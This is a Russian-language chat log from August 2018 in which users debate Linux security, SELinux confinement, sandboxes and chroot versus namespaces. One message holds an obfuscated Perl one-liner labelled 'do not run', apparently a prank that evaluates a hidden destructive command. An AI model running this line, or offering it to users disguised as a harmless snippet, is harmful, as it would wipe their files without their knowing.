
Asdf
11.08.2018
16:53:08
Я пока чистый дебиан попробую.

Remald
11.08.2018
16:53:18
но не такая простая к сожалению

Asdf
11.08.2018
16:54:54
>в плане безопасности
Один хрен, мой провайдер меня за NAT прячет.

Google

Maxim
11.08.2018
16:54:55
Главное - не готовить его методом setenforce 0

Remald
11.08.2018
16:55:09

Rabu
11.08.2018
16:55:16
вяленький какой-то срач
гентушники призываются в тред

Remald
11.08.2018
16:55:32

Asdf
11.08.2018
16:56:01

Remald
11.08.2018
16:56:22
странный вывод, ну если только ты в сеть не выходишь — тогда да
как будто без выделенного IP нельзя систему нагнуть
и вирус подцепить

Dr
11.08.2018
16:56:55

Asdf
11.08.2018
16:57:05

Remald
11.08.2018
16:57:58
В линуксе то?
ну если ты будешь твердо верить что это не возможно — то подцепишь
личные данные через уязвимость браузера украсть вообще изи, даже сам линукс взламывать не надо

Google

Remald
11.08.2018
16:58:45
потому что у браузера ко всей твоей домашней папке доступ

Rabu
11.08.2018
16:59:34
В линуксе то?
perl -es'!!),-#(-.?{<>-8#=..#<-*}>;*7-86)!;y!#()-?{}!\x20/`-v;<!;s++$_+ee'&:&:; (не запускать)

Asdf
11.08.2018
17:00:13

Remald
11.08.2018
17:00:20
линукс весьма уязвим ко всяким атакам, как любая ОС, его можно даже назвать достаточно дырявым

Victor
11.08.2018
17:00:34

Rabu
11.08.2018
17:00:40

Юра
11.08.2018
17:00:47

Dmitry
11.08.2018
17:00:56
можно собрать

Remald
11.08.2018
17:00:57
и под линукс вполне существует n-ое количество вирусов

Yurii
11.08.2018
17:01:12
https://www.tomshardware.com/news/x86-hidden-god-mode,37582.html

Victor
11.08.2018
17:01:14

Maxim
11.08.2018
17:01:29
Я его умею на уровне setsebool, audit2allow и chcon

Remald
11.08.2018
17:01:46

Юра
11.08.2018
17:01:56
Главное, что не порнобаннер

Rabu
11.08.2018
17:02:08

Asdf
11.08.2018
17:02:13
можно собрать
Скачать, сконфигурировать, скомпилировать, установить под рутом.

Remald
11.08.2018
17:02:19
да и порнобаннер тоже реально, просто юзеры линукс это не целевая аудитория

Rabu
11.08.2018
17:02:27
арч даже 32 бита не поддерживает
уже

Yurii
11.08.2018
17:02:34

Google

Victor
11.08.2018
17:02:43
я один раз промучился с одним сервером часа 2-3. сбросил парль рута через init=/bin/bash и он перестал загружаться, останавливаясь на чем-то типа starting login service [FAILED]. оказалось, это фишка selinux, чтобы не меняли /etc/shadow

Rabu
11.08.2018
17:02:55
на old x86 проще хр поставить

Yurii
11.08.2018
17:03:09
хотя на секурити всем было настолько насрать, что такие ухищрения вряд ли нужны были
есть 64бит XP

Rabu
11.08.2018
17:03:23
да

Remald
11.08.2018
17:03:35
если на линуксе начнут массово сидеть чайники, порнобанеры тоже появятся

Rabu
11.08.2018
17:03:39
но зачем, если есть 64бит 7 и арч

Yurii
11.08.2018
17:03:53
убунта

Rabu
11.08.2018
17:03:56

Yurii
11.08.2018
17:04:34
у меня рабочий десктоп - линупс, не все таким могут похвалиться
хоть и убунта

Remald
11.08.2018
17:04:47
а чтобы банально защититься хотя бы от кражи личных данных из хомяка и не попасть в ботнет или майнингпулл, нужно думать над защитой

Maxim
11.08.2018
17:04:59

Remald
11.08.2018
17:05:30
одни линуксы в ботнетах...
миллионами

Rabu
11.08.2018
17:05:39
top и kill в помощь

Yurii
11.08.2018
17:05:54
бля, я пароли держу у третьего дяди
хотя это на самом деле секурнее чем держать их в голове

Artem
11.08.2018
17:06:31

Remald
11.08.2018
17:08:52

Google

Yurii
11.08.2018
17:09:16
ну где-то так же

Victor
11.08.2018
17:09:24

Yurii
11.08.2018
17:09:30
в 2006 под вендой писал на дотнет 1.1 лол

Remald
11.08.2018
17:09:34
лет 5-6 сидел на арче, года 4 на fedora

Yurii
11.08.2018
17:09:48
а потом сугубо убунта

Victor
11.08.2018
17:09:58
Wow, а как называется? Чего-то не гуглится нихера
и вот люди страдают: https://unix.stackexchange.com/questions/321038/cannot-login-failed-to-start-login-service
и
https://serverfault.com/questions/887948/selinux-corrupted-now-unable-to-boot-centos-7-with-selinux-enabled

Maxim
11.08.2018
17:10:26
А, ну контекст поменять - это святое. Первое, что проверяю

Admin
ERROR: S client not available

Maxim
11.08.2018
17:11:04
Например, при копировании файлов из рута в директорию веб-сервера там остается юзерский контекст, и веб-сервер эти файлы читать не может

Remald
11.08.2018
17:12:00
я свои модули политики написал для браузера
так что его можно запускать с минимумом разрешений, необходимых для работы
домашняя директория ему не доступна
еще там же песочница есть, в selinux, встроенная
и ограниченные пользователи

Victor
11.08.2018
17:14:32

Remald
11.08.2018
17:15:07
chroot не есть песочница
selinux на уровне ядра изолирует

Victor
11.08.2018
17:15:53
а можно за чрут выйти?

Remald
11.08.2018
17:16:26
например, по умолчанию selinux запрещает ставить на область памяти флаги w и x одновременно

Google

Victor
11.08.2018
17:17:34
неси подробности

Remald
11.08.2018
17:17:40
если в чрут можно войти, то можно и выйти из него

Maxim
11.08.2018
17:17:49
Есть неймспейсы, из них не сбежать

Remald
11.08.2018
17:18:10
вот песочница selinux как раз неймспейсы поддерживает

Victor
11.08.2018
17:18:37
из неймспейсов - понятно, а про чрут не знаю. надо будет почитать

Remald
11.08.2018
17:19:05
и можно даже без песочницы ограничить процесс так, что ему будет можно только очень ограниченный набор действий
audit2allow помогает ограничить это минимальным уровнем доступа
можно запускать браузер под другим пользователем, xguest например
это именно пользователь selinux
тогда у него будет очень мало прав

Victor
11.08.2018
17:26:42
ты помешан на безопасности :)
@makkarpov , @synar , вы же, вроде бы, разработчики? зачем вам selinux?

Maxim
11.08.2018
17:48:27
Чтобы периодически с ним ебаться, когда что-то не работает
Но выключать систему безопасности просто потому, что не осилил - тоже не ок
+ у меня на десктопе крутятся всякие веб-серверы и прочие внешние сервисы, которые даже в инет смотрят периодически с белого IP

Victor
11.08.2018
17:49:23
не, я к тому, что обычно разработчики более безответственны, чем админы/инженеры
я обычно яро выступаю против того, чтобы разработчики руками ходили на тестовые и тем более продакшн-серверы: они то less оставят на лог-файле, что при удалении оного логротейтом место таки не освобождается и может закончиться так случайно, то мусор складывают.
на тестовый сервер дал доступ, чтобы на нём запускали свой "продукт", так смотрю туда поставили гцц, собрали буст и ффмпег из исходников уже в /usr/local... блин...